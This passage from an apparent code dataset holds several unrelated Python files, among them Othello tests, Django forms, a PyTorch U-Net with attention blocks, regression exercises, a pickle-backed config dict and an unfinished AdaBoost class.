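    def _greedy_move(legal_moves):
        best, best_flips = None, 0
        for square, flipped in legal_moves.items():
            if len(flipped) > best_flips:
                best, best_flips = square, len(flipped)
        return best  # None when no move exists, a falsy result like ai_move_decision's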
gm.player_turn = False\n gm.ai_make_move()\n assert bd.disks[2][0].fill_color == 'white'\n assert bd.disks[2][1].fill_color == 'white'\n assert bd.disks[2][2].fill_color == 'white'\n assert gm.player_turn\n # Check AI passes turn when no moves\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n bd.tile.change_color(2, 2, 0)\n bd.tile.change_color(3, 3, 0)\n bd.tile.change_color(3, 1, 255)\n bd.tile.change_color(1, 3, 255)\n gm.player_turn = False\n gm.ai_make_move()\n assert gm.player_turn\n assert not bd.end_game\n # Check game ends when AI and Player can not make a move\n bd.tile.change_color(0, 0, 0)\n bd.tile.change_color(1, 0, 0)\n bd.tile.change_color(0, 1, 0)\n gm.player_turn = False\n gm.ai_make_move()\n assert gm.player_turn\n assert bd.end_game\n\n\ndef test_update_turn():\n '''Test update_turn to make sure method is called correctly\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n bd.tile.get_all_tiles()\n bd.tile.starting_four_tiles()\n gm.update_turn()\n assert gm.player_turn\n assert not gm.print_turn\n # Can't test when bd.done = True since input method gives no javax module\n # error\n\n\ndef test_highest_score():\n '''Test that specific scores change the order in the file\n and that lower scores are only appended. Use scores_test.txt as test file.\n '''\n gc = GameController(400, 400)\n bd = Board(0, 100, 0, 400, 400, 0, 4, 100, 4, gc)\n gm = GameManager(bd)\n f = open('scores_test.txt', 'w').close()\n gm.highest_score('Test Name', 35, 'scores_test.txt')\n f = open('scores_test.txt', 'r')\n top = f.readlines()[0]\n assert top == 'Test Name 35\\n'\n f.close()\n gm.highest_score('Test Name 2', 20, 'scores_test.txt')\n f = open('scores_test.txt', 'r')\n lst = f.readlines()\n top = lst[0]\n second = lst[1]\n assert top == 'Test Name 35\\n'\n assert second == 'Test Name 2 20\\n'\n f.close()\n gm.highest_score('Test Name 3', 36, 'scores_test.txt')\n f = open('scores_test.txt', 'r')\n lst = f.readlines()\n top = lst[0]\n second = lst[1]\n last = lst[2]\n assert top == 'Test Name 3 36\\n'\n assert second == 'Test Name 35\\n'\n assert last == 'Test Name 2 20\\n'\n","sub_path":"OthelloGame/game_manager_test.py","file_name":"game_manager_test.py","file_ext":"py","file_size_in_byte":6823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226629208","text":"from django import forms\nfrom business.models import Test, Questions\n\n\n# ---------------------------------------question--------------------------\n\nclass QuestionCreateForm(forms.ModelForm):\n title = forms.CharField()\n question = forms.Textarea()\n\n # script=forms.FileField()\n\n class Meta:\n model = Questions\n fields = [\n 'title',\n 'question',\n 'pod_name',\n 'script'\n\n ]\n '''\n def clean_title(self):\n title = self.cleaned_data.get(\"title\").upper()\n return title\n '''\n\n# --------------------------------------test-------------------------------\nclass TestCreateForm(forms.ModelForm):\n questions = forms.ModelMultipleChoiceField(\n queryset=Questions.objects.all(),\n widget=forms.CheckboxSelectMultiple,\n required=True\n )\n\n class Meta:\n model = Test\n fields = [\n 'name',\n 'questions',\n ]\n","sub_path":"DevOps Examination 
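# Typical view-side use of a ModelForm like TestCreateForm above (a generic
# Django sketch; the view, template and URL names are illustrative, not
# taken from this project):
from django.shortcuts import redirect, render

def test_create_view(request):
    form = TestCreateForm(request.POST or None)
    if form.is_valid():
        form.save()  # persists the Test and its questions m2m selection
        return redirect('test-list')  # hypothetical URL name
    return render(request, 'test_form.html', {'form': form})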
System/CODE/devops_23march19/devops/business/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"250281462","text":"#USE PYTHON 64 BIT BECAUSE OF THE SIZE OF THE ARRAY\nimport numpy as np\nfrom sklearn.preprocessing import Imputer\n\nC = np.load(\"TestWithoutZipData.npy\")\nE = np.load(\"allDatav3.npy\")\n\n#MISSING VALUES PROBLEM\nimp = Imputer(missing_values='NaN', strategy='mean', axis=0)\nimp.fit(E)\nE = imp.transform(E)\n\n#CREATES EMPTY MATRIX FOR DATA WITH CLASS CLICK\na = np.empty((len(C[:, 0]), len(E[0, :]) + 2), dtype='f')\n\ncounter = 0\nfor i in range(0, len(a[:, 0])):\n #COMBINE THE DATA BY THE ZIP CODE AND GET RID OF THE ZIP\n a[i, 0] = C[i][1] #ALEXA\n a[i, 1] = C[i][2] #AUTHORITY\n a[i, 2] = C[i][3] #CHANCE TO BE CLICKED\n\n if C[i][0] != -1:\n t = np.where(C[i][0] == E[:, 0])\n\n #IF THERE IS NO ENTRY FOR THAT ZIP CODES ADD ONLY DOMAIN DATA\n if len(t[0]) > 0:\n a[i, 3:] = E[t[0][0]][1:] #ZIPCODE DATA\n\n else:\n a[i, 3] = -1\n\n else:\n a[i, 3] = -1\n\n #PROGRESS INDICATOR\n if counter % 100000 == 0:\n print(counter )\n counter += 1\n\n\nnp.save(\"testFINAL\", a)","sub_path":"Clustering and atribute chosing/numpyData/final_Clusters/Final Prediction Test Set/Preparing Train and Test data/CombineTestwithZipData.py","file_name":"CombineTestwithZipData.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"217226354","text":"\n\nfrom xai.brain.wordbase.nouns._enthusiasm import _ENTHUSIASM\n\n#calss header\nclass _ENTHUSIASMS(_ENTHUSIASM, ):\n\tdef __init__(self,): \n\t\t_ENTHUSIASM.__init__(self)\n\t\tself.name = \"ENTHUSIASMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"enthusiasm\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_enthusiasms.py","file_name":"_enthusiasms.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"39418606","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Aug 15 18:15:03 2020\r\n\r\n@author: Lishen Qiu\r\n\"\"\"\r\nfrom __future__ import division\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch\r\nfrom numpy.linalg import svd\r\nfrom numpy.random import normal\r\nimport math\r\nfrom math import sqrt\r\nfrom torchsummary import summary\r\nimport scipy.io as io\r\nimport numpy as np\r\nimport torch.optim as optim\r\nimport torch.utils.data \r\nimport torch\r\nimport os\r\nimport os.path as osp\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import Dataset, DataLoader\r\n\r\nclass ChannelAttention(nn.Module):\r\n def __init__(self, in_planes, ratio):\r\n super(ChannelAttention, self).__init__()\r\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\r\n self.max_pool = nn.AdaptiveMaxPool2d(1)\r\n self.fc1 = nn.Conv2d(in_planes, in_planes // ratio, 1, bias=False)\r\n self.relu1 = nn.ReLU()\r\n self.fc2 = nn.Conv2d(in_planes // ratio, in_planes, 1, bias=False)\r\n self.sigmoid = nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n avg_out = self.fc2(self.relu1(self.fc1(self.avg_pool(x))))\r\n max_out = self.fc2(self.relu1(self.fc1(self.max_pool(x))))\r\n out = avg_out + max_out\r\n return self.sigmoid(out)\r\n\r\nclass SpatialAttention(nn.Module):\r\n def __init__(self,kernel_size_L,kernel_size_W,stride):\r\n super(SpatialAttention, self).__init__()\r\n self.conv1 = nn.Conv2d(2, 1, 
kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True)\r\n self.sigmoid = nn.Sigmoid()\r\n\r\n def forward(self, x):\r\n avg_out = torch.mean(x, dim=1, keepdim=True)\r\n max_out, _ = torch.max(x, dim=1, keepdim=True)\r\n x = torch.cat([avg_out, max_out], dim=1)\r\n x = self.conv1(x)\r\n return self.sigmoid(x)\r\n\r\nclass SELayer(nn.Module):\r\n def __init__(self, channel, reduction):\r\n super(SELayer, self).__init__()\r\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\r\n# print(self.avg_pool.size())\r\n self.fc = nn.Sequential(\r\n nn.Linear(channel, channel // reduction, bias=False),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(channel // reduction, channel, bias=False),\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, x):\r\n b, c, _, _ = x.size()\r\n y = self.avg_pool(x).view(b, c)\r\n y = self.fc(y).view(b, c, 1, 1)\r\n return x * y.expand_as(x)\r\n\r\n \r\n\r\nclass conv_1_block_DW(nn.Module):\r\n \"\"\"\r\n Convolution Block \r\n \"\"\"\r\n def __init__(self, in_ch, out_ch,kernel_size_L,kernel_size_W,stride):\r\n super(conv_1_block_DW, self).__init__()\r\n \r\n self.conv = nn.Sequential(\r\n \r\n \r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n# SELayer(out_ch, 8),\r\n\r\n )\r\n self.ca =ChannelAttention(out_ch,8)\r\n self.sp =SpatialAttention(kernel_size_L,kernel_size_W,stride=1)\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.ca(x)* x\r\n# x = self.sp(x)* x\r\n return x\r\n \r\nclass conv_1_block_MD(nn.Module):\r\n \"\"\"\r\n Convolution Block \r\n \"\"\"\r\n def __init__(self, in_ch, out_ch,kernel_size_L,kernel_size_W,stride):\r\n super(conv_1_block_MD, self).__init__()\r\n \r\n self.conv = nn.Sequential(\r\n \r\n \r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n# SELayer(out_ch, 8),\r\n\r\n )\r\n self.ca =ChannelAttention(out_ch,8)\r\n self.sp =SpatialAttention(kernel_size_L,kernel_size_W,stride=1)\r\n \r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.ca(x)* x\r\n# x = self.sp(x)* x\r\n return x\r\n\r\nclass conv_1_block_UP(nn.Module):\r\n \"\"\"\r\n Convolution Block \r\n \"\"\"\r\n def __init__(self, in_ch, out_ch,kernel_size_L,kernel_size_W,stride):\r\n super(conv_1_block_UP, self).__init__()\r\n \r\n self.conv = nn.Sequential(\r\n \r\n \r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n# SELayer(out_ch, 8),\r\n )\r\n self.ca =ChannelAttention(out_ch,8)\r\n self.sp =SpatialAttention(kernel_size_L,kernel_size_W,stride=1)\r\n def forward(self, x):\r\n x = self.conv(x)\r\n x = self.ca(x)* x\r\n# x = self.sp(x)* x\r\n return x \r\n \r\nclass Context_comparison(nn.Module):\r\n \"\"\"\r\n Convolution Block \r\n \"\"\"\r\n def __init__(self, in_ch, out_ch,kernel_size_L,kernel_size_W,stride):\r\n super(Context_comparison, self).__init__()\r\n \r\n self.conv1 = nn.Sequential(\r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,kernel_size_W//2), bias=True),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n )\r\n self.conv2 = nn.Sequential(\r\n nn.Conv2d(in_ch, out_ch, kernel_size=(kernel_size_L,kernel_size_W), stride=stride,padding=(0,(kernel_size_W+7)//2), 
bias=True,dilation=5),\r\n nn.BatchNorm2d(out_ch),\r\n nn.ReLU(inplace=True),\r\n )\r\n self.ca =ChannelAttention(out_ch,8)\r\n self.sp =SpatialAttention(kernel_size_L,kernel_size_W,stride=1)\r\n self.conv1m1 = nn.Conv2d(in_channels=out_ch*3, out_channels=out_ch, kernel_size=(1,1),padding=0) \r\n def forward(self, x):\r\n x1 = self.conv1(x)\r\n x1 = self.ca(x1)* x1\r\n x1 = self.conv1(x1)\r\n x1 = self.ca(x1)* x1\r\n \r\n x2 = self.conv2(x)\r\n x2 = self.ca(x2)* x2\r\n x2 = self.conv2(x2)\r\n x2 = self.ca(x2)* x2\r\n# print(x1.shape)\r\n# print(x2.shape)\r\n x3=x1-x2\r\n# print(x1.shape)\r\n# print(x3.shape)\r\n xout = torch.cat((x1,x2,x3), 1) \r\n# print(xout.shape)\r\n xout=self.conv1m1(xout)\r\n return xout \r\n \r\nclass IMUnet(nn.Module):#库中的torch.nn.Module模块\r\n def __init__(self,in_channels =1):\r\n super(IMUnet, self).__init__()\r\n \r\n self.conv1_1=conv_1_block_DW( 1, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n self.conv1_2=conv_1_block_DW(16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n self.conv1_3=conv_1_block_DW(16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n \r\n self.conv2_1=conv_1_block_DW(16, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n self.conv2_2=conv_1_block_DW(32, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n self.conv2_3=conv_1_block_DW(32, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n \r\n self.conv3_1=conv_1_block_DW(32, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n self.conv3_2=conv_1_block_DW(48, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n self.conv3_3=conv_1_block_DW(48, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n \r\n self.conv4_1=conv_1_block_MD(48, 64, kernel_size_L=1,kernel_size_W=3,stride=1)\r\n# self.conv4_2=conv_1_block_MD(64, 64, kernel_size_L=1,kernel_size_W=3,stride=1)\r\n self.conv4_2=Context_comparison(64, 64, kernel_size_L=1,kernel_size_W=3,stride=1)\r\n self.conv4_3=conv_1_block_MD(64, 64, kernel_size_L=1,kernel_size_W=3,stride=1)\r\n \r\n self.conv5_1=conv_1_block_UP(48+64, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n self.conv5_2=conv_1_block_UP(48, 48, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n self.conv5_3=conv_1_block_UP(48, 32, kernel_size_L=1,kernel_size_W=5,stride=1)\r\n \r\n self.conv6_1=conv_1_block_UP(32+32, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n self.conv6_2=conv_1_block_UP(32, 32, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n self.conv6_3=conv_1_block_UP(32, 16, kernel_size_L=1,kernel_size_W=15,stride=1)\r\n \r\n self.conv7_1=conv_1_block_UP(16+16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n self.conv7_2=conv_1_block_UP(16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n self.conv7_3=conv_1_block_UP(16, 16, kernel_size_L=1,kernel_size_W=25,stride=1)\r\n \r\n self.conv1m1 = nn.Conv2d(in_channels=16, out_channels=1, kernel_size=(1,1),padding=0) \r\n \r\n self.avepool1 = nn.AvgPool2d((1, 5), stride=5) \r\n self.avepool2 = nn.AvgPool2d((1, 2), stride=2)\r\n self.avepool3 = nn.AvgPool2d((1, 2), stride=2)\r\n \r\n self.up1 = nn.Upsample(size=(1, 360), scale_factor=None, mode='bilinear', align_corners=None) \r\n self.up2 = nn.Upsample(size=(1, 720), scale_factor=None, mode='bilinear', align_corners=None) \r\n self.up3 = nn.Upsample(size=(1, 3600), scale_factor=None, mode='bilinear', align_corners=None) \r\n \r\n\r\n def forward(self, x):# print(x.shape)\r\n\r\n x1_1 = self.conv1_1(x)\r\n x1_2 = self.conv1_2(x1_1)\r\n x1_3 = self.conv1_3(x1_2) \r\n x1 = self.avepool1(x1_3)\r\n\r\n x2_1 = self.conv2_1(x1)\r\n x2_2 = self.conv2_2(x2_1)\r\n x2_3 = 
self.conv2_3(x2_2)\r\n x2 = self.avepool2(x2_3)\r\n\r\n x3_1 = self.conv3_1(x2)\r\n x3_2 = self.conv3_2(x3_1)\r\n x3_3 = self.conv3_3(x3_2)\r\n x3 = self.avepool3(x3_3)\r\n \r\n x4_1 = self.conv4_1(x3)\r\n x4_2 = self.conv4_2(x4_1)\r\n x4 = self.conv4_3(x4_2)\r\n\r\n x4 = self.up1(x4)\r\n# print(x4.shape)\r\n# print(x3_3.shape)\r\n x4 = torch.cat((x4, x3_3), 1) \r\n x5_1 = self.conv5_1(x4)\r\n x5_1=x5_1.add(x3_3)\r\n# x5_1 = torch.add((x5_1, x3_3)) \r\n x5_2 = self.conv5_2(x5_1)\r\n# x5_2 = torch.add((x5_2, x3_3)) \r\n x5_2=x5_2.add(x3_3)\r\n x5 = self.conv5_3(x5_2)\r\n\r\n x5 = self.up2(x5)\r\n x5 = torch.cat((x5, x2_3), 1) \r\n x6_1 = self.conv6_1(x5)\r\n# x6_1 = torch.add((x6_1, x2_3)) \r\n x6_1=x6_1.add(x2_3)\r\n x6_2 = self.conv6_2(x6_1) \r\n x6_2=x6_2.add(x2_3)\r\n x6 = self.conv6_3(x6_2)\r\n\r\n\r\n x6 = self.up3(x6)\r\n x6 = torch.cat((x6, x1_3), 1) \r\n x7_1 = self.conv7_1(x6)\r\n x7_1=x7_1.add(x1_3)\r\n x7_2 = self.conv7_2(x7_1)\r\n x7_2=x7_2.add(x1_3)\r\n x7 = self.conv7_3(x7_2)\r\n\r\n Xout = self.conv1m1(x7)\r\n\r\n return Xout\r\n \r\n \r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") # PyTorch v0.4.0\r\nmodel = IMUnet().to(device)\r\nsummary(model, (1,1,3600))","sub_path":"Stage1_IMUnet.py","file_name":"Stage1_IMUnet.py","file_ext":"py","file_size_in_byte":10808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"242891343","text":"# -*- coding: utf-8 -*-\n\n'''\nfootfall_BANDUNG_20160501_shard3_replica1: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException:\nIndex dir 'hdfs://virapapp61.telkomsel.co.id:8020/solr6/footfall_BANDUNG_20160501/core_node3/data/index/'\nof core 'footfall_BANDUNG_20160501_shard3_replica1' is already locked. 
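# Looking back at Stage1_IMUnet.py above: ChannelAttention is the channel
# branch of CBAM (Woo et al., 2018),
#
#   M_c(F) = sigmoid( MLP(AvgPool(F)) + MLP(MaxPool(F)) )
#
# with the shared MLP being the fc1 -> ReLU -> fc2 bottleneck controlled by
# `ratio`. A quick shape check (illustrative sizes):
#
#   ca = ChannelAttention(in_planes=16, ratio=8)
#   x = torch.randn(2, 16, 1, 3600)      # (batch, channels, H, W)
#   assert (ca(x) * x).shape == x.shape  # the map only rescales channels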
The most likely cause is another Solr server\n(or another solr core in this server) also configured to use this directory; other possible causes may be specific to lockType: hdfs\n'''\n\nimport re\n\ninput_file = '/Users/shixinluo/Downloads/collection_lock.txt'\n\noutput_file = '/Users/shixinluo/Downloads/collection_lock_format.txt'\n\nfo = open(output_file,'w')\n\nwith open(input_file, 'r') as fi:\n for line in fi:\n m = re.search(r'(hdfs://.*?/\\')', line)\n if m:\n fo.write(m.group(0)[:-2]+'/write.lock\\n')\n\nfo.close()\n\n","sub_path":"TEST/extract_dir.py","file_name":"extract_dir.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"292750107","text":"import numpy as np\n\n\nclass Dataset(object):\n \"\"\" Skeletons of a dataset \"\"\"\n\n # Is this ugly?\n def __init__(self, feature_names=np.array([]), target_names=np.array([]),\n data=np.array([]), target=np.array([]), DESCR=\"\"):\n self.feature_names = feature_names\n self.target_names = target_names\n self.data = data\n self.target = target\n self.DESCR = DESCR\n\n def set_feature_names(self, feature_names):\n self.feature_names = feature_names\n\n def set_target_names(self, target_names):\n self.target_names = target_names\n\n def set_data(self, data):\n self.data = data\n\n def set_target(self, target):\n self.target = target\n\n def set_DESCR(self, DESCR):\n self.DESCR = DESCR\n\n def load_from_txts_if_categorical(self, names_file, data_file):\n with open(names_file) as f:\n self.DESCR = f.readlines()\n\n # I transpose completely for my ease of thinking\n raw_data = np.genfromtxt(data_file, dtype=str, delimiter=',').T\n\n # Feature key as dict\n feature_key = {}\n feature_num = 0\n for nd_feature in raw_data:\n cat_value = 0\n feature = {}\n for nd_cat in np.unique(nd_feature):\n feature[str(nd_cat)] = cat_value\n cat_value += 1\n feature_key[feature_num] = feature\n feature_num += 1\n\n # does order matter? 
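        # The loop above hand-rolls an ordinal encoding: every distinct
        # string of a feature gets a stable integer id. Per feature the
        # same mapping can be written as
        #
        #   cats = np.unique(nd_feature)                  # sorted values
        #   feature = {str(c): i for i, c in enumerate(cats)}
        #
        # (sklearn.preprocessing.OrdinalEncoder covers the general case.)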
I don't see how we could change this dynamically\n self.feature_key = feature_key\n\n for y in range(len(raw_data)):\n for x in range(len(raw_data[y])):\n raw_data[y][x] = feature_key[y][str(raw_data[y][x])]\n\n self.data = raw_data[:len(raw_data) - 1].T.astype(np.float)\n self.target = raw_data[len(raw_data) - 1:].T.astype(np.float).flatten()\n\n\n # This kind of is still specific to iris dataset :/\n def load_from_txts_if_numerical(self, names_file, data_file):\n with open(names_file) as f:\n self.DESCR = f.readlines()\n\n raw_data = np.genfromtxt(data_file, dtype=str, delimiter=',')\n\n self.data = raw_data[:, :len(raw_data[0])-1].astype(np.float)\n\n raw_targets = raw_data[:, len(raw_data[0]) - 1:]\n target_key = {}\n target_num = 0\n for nd_target in np.unique(raw_targets):\n target_key[str(nd_target)] = target_num\n target_num += 1\n\n for x in range(len(raw_targets)):\n raw_targets[x] = target_key[raw_targets[x][0]]\n\n self.target = raw_targets.astype(np.float).flatten()\n\n\n def load_dataset_from_iris_csv(self, csv_file):\n csv = np.genfromtxt(csv_file, dtype=str, delimiter=\",\")\n for x in range(len(csv)):\n for y in range(len(csv[x])):\n csv[x][y] = csv[x][y].replace(\"\\\"\", \"\")\n\n self.feature_names = csv[:1, 1:5]\n self.target_names = np.array(set(csv[1:, 5:6].flatten()))\n self.data = csv[1:, 1:5].astype(np.float)\n self.target = csv[1:, 5:6]\n\n for index in range(len(self.target)):\n if self.target[index] == 'setosa':\n self.target[index] = 0\n elif self.target[index] == 'versicolor':\n self.target[index] = 1\n elif self.target[index] == 'virginica':\n self.target[index] = 2\n self.target = self.target.flatten().astype(np.int)\n","sub_path":"kNN/Dataset.py","file_name":"Dataset.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"416737745","text":"#this is - Polynomial Linear Regression Excersize\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import linear_model\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn import preprocessing\r\n\r\nX=pd.read_csv('Poly_LR.csv')\r\ny=X.Salary\r\nX=X.drop(['Position','Salary'],axis=1)\r\n\r\n#this is linear Regression \r\nl_model = linear_model.LinearRegression()\r\n\r\nl_model.fit(X,y)\r\n\r\n#graph to show how it is not perfect/good for our example\r\nplt.scatter(X,y,color='r')\r\nplt.plot(X,l_model.predict(X),color='b')\r\nplt.show()\r\n\r\n# use of polynomial Linear Regression\r\npl_model = preprocessing.PolynomialFeatures(3)\r\nX_poly = pl_model.fit_transform(X)\r\n\r\nl_model_new = linear_model.LinearRegression()\r\n\r\nl_model_new.fit(X_poly,y)\r\n\r\n#graph to show how it is perfect/good for our example\r\nplt.scatter(X,y,color='r')\r\nplt.plot(X,l_model_new.predict(X_poly),color='b')\r\nplt.title('Position-Salary Mapping')\r\nplt.xlabel('Position Level')\r\nplt.ylabel('Salary')\r\nplt.show()\r\n\r\n#lets store this trained model\r\nimport pickle\r\n\r\npickle.dump(l_model_new,open('Poly_LR_Model.pkl','wb'))\r\n\r\nLoaded_model = pickle.load(open('Poly_LR_Model.pkl','rb'))\r\n\r\nprint(Loaded_model.predict([[1,4,16,64]]))\r\n\r\n#below is for Polynomial Linear Regression exercize for Social Ads\r\n#not polynomial. 
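# On the prediction above: the pickled model expects the expanded design
# matrix, so [[1, 4, 16, 64]] is [x**0, x**1, x**2, x**3] for level x = 4.
# The fitted transformer builds that row without hand-computed powers:
row = pl_model.transform([[4]])      # -> [[1., 4., 16., 64.]]
print(Loaded_model.predict(row))     # same prediction as above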
Its seems to be logistics regression\r\n\r\nX1=pd.read_csv('lr_poly_social_ads.csv')\r\nX1.describe()\r\nX1.info()\r\ny1 = X1.Purchased\r\nX1 = X1.drop(['User ID'],axis = 1)\r\nX1.replace(['Male','Female'],['1','0'], inplace = True)\r\n","sub_path":"Poly_LR.py","file_name":"Poly_LR.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"498832703","text":"\"\"\"\ndodanie do pliku konf wartości typu email=marian@gmail.com\nobsługa wyjątków, błedna scieżka, brak uprawnien do zapisu, nieistniejący klucz w słowniku\n Usages:\n ./assignment_3.py (reads out the entire config dict)\n ./assignment_3.py thiskey thisvalue (sets 'thiskey' and 'thisvalue' in the dict)\n\"\"\"\nimport os\nimport pickle\n\nclass ConfigKeyError(Exception): # klasa obsługi wyjątku braku klucza, wywołanie nieistaniejącego klucza np cd['klucz4']\n def __init__(self, this, key): # this to przekazany obiekt konfliktu typu dict, self to obiekt konfliktu self, key to nieistniejący klucz\n self.key = key\n self.keys = this.keys() # keys - klucze dostepne w konflikcie dict (chcemy pokazac użytkownikowi które klucze są dostępne jesli wywołał klucz nieistniejący)\n def __str__(self): # funkcja __str__ działa kiedy nastąpi wyjątek\n return 'key \"{0}\" not found. Avialable keys: ({1})'.format(self.key, ', '.join(self.keys))\n\nclass ConfigDict(dict):\n\n config_directory = \"C:\\\\Users\\\\dudam\\\\PycharmProjects\\\\test1\\\\config\"\n\n def __init__(self, picklename):\n self._filename = os.path.join(self.config_directory, picklename + '.pickle')\n\n if not os.path.isfile(self._filename):\n with open(self._filename, 'wb') as fh:\n pickle.dump(\"a\", fh)\n with open(self._filename, 'rb') as fh:\n pkl = pickle.load(fh)\n self.update(pkl)\n\n # w klasie nadrzednej dict jest tworzona instancja naszego słownika - przez przeczytanie wszystkich linii pliku i dodanie do słownika\n\n def __getitem__(self, key): # motoda dp spr czy wywoływany klucz a dict intnieje w razie takiego wywołania cd['klucz4']\n if not key in self: # spr czy klucz wywoływany istnisje\n raise ConfigKeyError(self, key) # jesli nie istnieje uruchom instancję klasy obsługi wyjątku: ConfigKeyError\n return dict.__getitem__(self, key) # jesli istnieje dokoncz normalnie procedurę __getitem__\n\n\n def __setitem__(self, key, value): #funkcja klasy nadrzednej dict wywoływana przez dodanie elementu do słownika: cd['klucz3']='wartosc3'\n dict.__setitem__(self, key, value)\n with open(self._filename, 'w') as fh:\n pickle.dump(self, fh)\n\n\n\ncd = ConfigDict('config_file')\ncd['klucz3']='wartosc3'\n\nprint(cd)\n","sub_path":"assigment4.py","file_name":"assigment4.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"399180845","text":"__author__ = 'KO CE06'\n\n# Create a program that ask for numbers and find the largest in a series of numbers. The program\n# must prompt the user to enter numbers one by one. 
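# Referring back to ConfigDict in assigment4.py above: pickle is a binary
# protocol, so both file writes need binary mode, and the initial dump
# should seed an empty dict rather than the string "a" (self.update("a")
# raises ValueError). A corrected sketch of the persistence pieces:
#
#   if not os.path.isfile(self._filename):
#       with open(self._filename, 'wb') as fh:
#           pickle.dump({}, fh)
#
#   def __setitem__(self, key, value):
#       dict.__setitem__(self, key, value)
#       with open(self._filename, 'wb') as fh:   # 'w' would raise TypeError
#           pickle.dump(dict(self), fh)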
When user enters 0 or negative number,\n# the program must display the largest non negative\n\nmax = 1\nnumber = 1\nwhile number > 0:\n number = int(input(\"Enter number: \"))\n if(number > max):\n max = number\nprint(max)","sub_path":"LAB205.py","file_name":"LAB205.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"85960206","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\nclass BasicAdaboost(object):\n\n #\n def __init__(self, base_estimator=None, n_iteration=100, target=0.001, x_train=np.array([]), y_train=np.array([]), x_test=np.array([]), y_test=np.array([])):\n self.base_estimator = base_estimator ### 基分类器的类型\n self.n_iteration= n_iteration ### 迭代次数等于基分类器的个数\n self.target = target\n # adaboost 弱分类器的权重\n self.beta = []\n # adaboost 的多个弱分类器\n self.estimators = []\n # x_train 和 y_train 是输入的训练集\n self.x_train = x_train\n self.y_train = y_train\n # x_test 和 y_test 是输入的测试集\n self.x_test = x_test\n self.y_test = y_test\n # adaboost 的权重\n self.weights = [1]*len(self.x_train)\n self.bootstrap = range(0, len(self.x_train))\n\n\n\n def train_one_iteration(self,iter):\n clf = self.base_estimator()\n clf.fit(self.x_train[self.bootstrap],self.y_train[self.bootstrap])\n y_train_result = clf.predict(self.x_train[self.bootstrap])\n errors = (self.y_train[self.bootstrap] != y_train_result)\n error = 